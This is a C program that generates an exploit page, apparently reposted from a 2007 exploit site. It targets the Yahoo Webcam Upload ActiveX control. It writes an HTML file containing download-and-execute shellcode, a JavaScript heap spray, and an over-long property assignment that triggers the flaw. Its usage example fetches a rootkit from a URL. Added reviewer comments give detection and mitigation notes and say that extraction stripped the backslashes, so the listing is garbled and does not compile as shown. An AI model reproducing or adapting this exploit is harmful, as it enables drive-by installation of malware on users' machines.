Rated as : High Risk
/*
Compile in LCC-win32 (Free!)
Download and exec any file you like!
Have Fun!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/*
 * Output settings and payload data for the HTML page this generator writes.
 *
 * NOTE(review): the listing lost its backslashes in extraction (the \x, \n, \r and
 * escaped-quote sequences appear as bare x, n, rn and unescaped quotes). As shown,
 * the arrays hold ASCII text rather than the intended byte values and several
 * string literals are not valid C. The code is left exactly as published.
 */
char *file = "Click_here.html";
FILE *fp = NULL;
/*
 * sc: the machine-code payload, written as hex escapes. Two NUL-terminated ASCII
 * strings are readable inside it:
 *   75 72 6C 6D 6F 6E 2E 64 6C 6C 00  ->  urlmon.dll
 *   43 3A 5C 55 2E 65 78 65 00        ->  C:\U.exe
 * The author's header comment describes the payload as download-and-execute, and
 * main() appends the URL argument directly after this array. Presumably C:\U.exe
 * is the path the fetched file is saved to (confirm by analysis in a sandbox).
 * For responders, a C:\U.exe created by a browser process is the artifact to hunt for.
 */
unsigned char sc[] =
"xEBx54x8Bx75x3Cx8Bx74x35x78x03xF5x56x8Bx76x20x03"
"xF5x33xC9x49x41xADx33xDBx36x0FxBEx14x28x38xF2x74"
"x08xC1xCBx0Dx03xDAx40xEBxEFx3BxDFx75xE7x5Ex8Bx5E"
"x24x03xDDx66x8Bx0Cx4Bx8Bx5Ex1Cx03xDDx8Bx04x8Bx03"
"xC5xC3x75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00x43x3Ax5C"
"x55x2ex65x78x65x00x33xC0x64x03x40x30x78x0Cx8Bx40"
"x0Cx8Bx70x1CxADx8Bx40x08xEBx09x8Bx40x34x8Dx40x7C"
"x8Bx40x3Cx95xBFx8Ex4Ex0ExECxE8x84xFFxFFxFFx83xEC"
"x04x83x2Cx24x3CxFFxD0x95x50xBFx36x1Ax2Fx70xE8x6F"
"xFFxFFxFFx8Bx54x24xFCx8Dx52xBAx33xDBx53x53x52xEB"
"x24x53xFFxD0x5DxBFx98xFEx8Ax0ExE8x53xFFxFFxFFx83"
"xECx04x83x2Cx24x62xFFxD0xBFx7ExD8xE2x73xE8x40xFF"
"xFFxFFx52xFFxD0xE8xD7xFFxFFxFF";
/* url: set from argv[1] in main(). */
char *url = NULL;
/* sc_2: only its first byte is copied by main(), directly after the URL. */
unsigned char sc_2[] = "x00x98";
/*
 * header: opening part of the generated page. It instantiates the ActiveX control
 * with classid DCE2F8B1-A520-11D4-8FD0-00D0B7730277 under the id viewme and starts
 * a script that assigns the variable shellcode from an unescape() call beginning
 * with %u9090 padding. PrintPayLoad() supplies the rest of that expression.
 * Defensive notes: this CLSID in an object tag is the simplest content signature
 * for the page. Applying the vendor fix referenced by the advisories linked in
 * main(), or setting the Internet Explorer kill bit for this CLSID, stops the
 * control from being instantiated.
 */
char * header =
"<html>n"
"<object
classid="clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277"
id='viewme'></object>n"
"<body>n"
"<SCRIPT language="javascript">n"
"var shellcode = unescape("%u9090%u9090%u9090%u9090" +
n";
/*
 * footer: script text written after the encoded payload. It has two parts:
 *   1. a heap-spray loop that grows a %u9090 filler block towards 0x40000
 *      characters and stores 500 copies of block + shellcode in an array;
 *   2. the trigger, which builds a string of 0x0a characters at least 5000 long,
 *      assigns it to the control's server property, then calls initialize() and send().
 * Large unescape(%u...) allocations in a loop, followed by an over-long property
 * assignment on an ActiveX object, is the behaviour script-level detections key on.
 */
char * footer =
"nn"
"bigblock = unescape("%u9090%u9090");n"
"headersize = 20;n"
"slackspace = headersize+shellcode.length;n"
"while (bigblock.length<slackspace) bigblock+=bigblock;n"
"fillblock = bigblock.substring(0, slackspace);n"
"block = bigblock.substring(0, bigblock.length-slackspace);n"
"while(block.length+slackspace<0x40000) block =
block+block+fillblock;n"
"memory = new Array();n"
"for (x=0; x<500; x++) memory[x] = block + shellcode;n"
"var buffer = '\x0a';n"
"while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';n"
"viewme.server = buffer;n"
"viewme.initialize();n"
"viewme.send();n";
/* trigger_1: despite the name, this only closes the script, body and html tags. */
char * trigger_1 =
"</script>n"
"</body>n"
"</html>n";
// print unicode shellcode
/*
 * Writes lpBuff as a sequence of %uXXXX tokens (one per 16-bit unit), the form
 * consumed by the JavaScript unescape() call opened in header. Every token goes
 * both to stdout and to the global fp. A new quoted fragment is started every
 * 16 bytes (8 tokens), and the expression is closed after the last token.
 *
 * lpBuff   - buffer to encode; read through an unsigned short pointer.
 * buffsize - number of bytes to encode. The loop steps by 2, so when buffsize is
 *            odd the last token also reads the byte at index buffsize. main()
 *            passes a zero-filled 1024-byte buffer, so that byte is 0 there.
 *
 * NOTE(review): the quote characters in the printf/fprintf literals below lost
 * their backslashes in extraction, so these lines do not compile as shown.
 * NOTE(review): the cast assumes lpBuff is suitably aligned and the token values
 * depend on host byte order (presumably little-endian x86, confirm).
 * fp is used without a NULL check; main() only calls this after fopen succeeded.
 */
void PrintPayLoad(char *lpBuff, int buffsize)
{
int i;
/* i counts bytes; each pass consumes two of them as one 16-bit unit. */
for(i=0;i<buffsize;i+=2)
{
if((i%16)==0)
{
if(i!=0)
{
printf(""n"");
fprintf(fp, "%s", "" +n"");
}
else
{
printf(""");
fprintf(fp, "%s", """);
}
}
printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
}
printf("";n");
fprintf(fp, "%s", "");n");
fflush(fp);
}
/*
 * Command-line entry point: takes a URL and an optional output file name and
 * writes an HTML page made of header + encoded (sc, URL, first byte of sc_2) +
 * footer + trigger_1.
 *
 * NOTE(review): escape sequences in the string literals below (rn, n) lost their
 * backslashes in extraction and some literals are split across lines, so this
 * function does not compile as shown.
 * NOTE(review): void main is non-standard, and fp is never passed to fclose.
 */
void main(int argc, char **argv)
{
/* Staging buffer for the payload bytes; fixed at 1024 bytes. */
unsigned char buf[1024] = {0};
int sc_len = 0;
int n;
/* No URL argument: print the banner, advisory links and usage, then exit. */
if (argc < 2)
{
printf("rnYahoo 0day Ywcupl.dll ActiveX Exploit Download And
Execn");
printf("link:http://research.eeye.com/html/advisories/upcoming/20070605.htmln");
printf("link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
n");
printf("link:http://secunia.com/advisories/25547/n");
printf("greetz to Jambalaya for helping with this coden");
printf("rnUsage: %s <URL> [htmlfile]n", argv[0]);
printf("rnE.g.: %s http://www.malwarehere.com/rootkit.exe
exploit.htmlrnn", argv[0]);
printf("=-Excepti0n-=n");
exit(1);
}
url = argv[1];
/*
 * Scheme check. strstr matches anywhere in the string, so this does not actually
 * enforce the prefix the error message claims. Only a minimum length is checked.
 */
if( (!strstr(url, "http://") && !strstr(url,
"ftp://")) || strlen(url) < 10)
{
printf("[-] Invalid url. Must start with 'http://','ftp://'n");
return;
}
printf("[+] download url:%sn", url);
/* Optional second argument overrides the default output name Click_here.html. */
if(argc >=3) file = argv[2];
printf("[+] exploit file:%sn", file);
fp = fopen(file, "w");
if(!fp)
{
printf("[-] Open file error!n");
return;
}
//build Exploit HTML File
fprintf(fp, "%s", header);
fflush(fp);
/*
 * Assemble sc, then the URL, then one byte of sc_2 in buf.
 * NOTE(review): there is no upper bound on strlen(url), so a long argument makes
 * these memcpy calls write past the 1024-byte buf.
 */
memset(buf, 0, sizeof(buf));
sc_len = sizeof(sc)-1;
memcpy(buf, sc, sc_len);
memcpy(buf+sc_len, url, strlen(url));
sc_len += strlen(url);
memcpy(buf+sc_len, sc_2, 1);
sc_len += 1;
/* Emit the assembled bytes as %uXXXX tokens, completing the unescape() call. */
PrintPayLoad((char *)buf, sc_len);
fprintf(fp, "%s", footer);
fflush(fp);
fprintf(fp, "%s", trigger_1);
fflush(fp);
printf("[+] exploit write to %s success!n", file);
}
// =-Excepti0n-=
securitydot.net - 2007-06-09